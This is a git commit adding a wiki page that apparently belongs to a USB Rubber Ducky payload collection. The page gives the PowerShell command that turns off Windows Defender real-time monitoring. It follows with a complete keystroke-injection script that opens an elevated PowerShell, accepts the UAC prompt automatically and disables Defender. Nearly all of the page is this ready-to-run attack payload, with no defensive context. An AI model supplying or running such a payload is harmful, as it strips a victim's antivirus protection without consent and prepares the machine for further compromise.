Created Payload - Windows 10 : Disable Windows Defender through powershell (markdown)

2017-03-30 14:05:21 -04:00 · 2017-03-30 14:05:21 -04:00 · b203d65a2d
parent 97312fa03e
commit b203d65a2d
1 changed files with 28 additions and 0 deletions
--- a/Payload---Windows-10-:-Disable-Windows-Defender-through-powershell.md
+++ b/Payload---Windows-10-:-Disable-Windows-Defender-through-powershell.md
@ -0,0 +1,28 @@
+Windows defender can be disabled with PS using the following command
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+An example script: 
+
+```
+REM Windows 10: Disable Windows Defender with Powershell
+REM Author: Judge2020
+REM author website: Judge2020.com
+REM  
+REM let the HID enumerate
+DELAY 1000
+GUI r
+DELAY 200
+REM my best attempt at a elevated powershell instance
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 1000
+ALT y
+DELAY 200
+STRING Set-MpPreference -DisableRealtimeMonitoring $true
+ENTER
+STRING exit
+ENTER
+```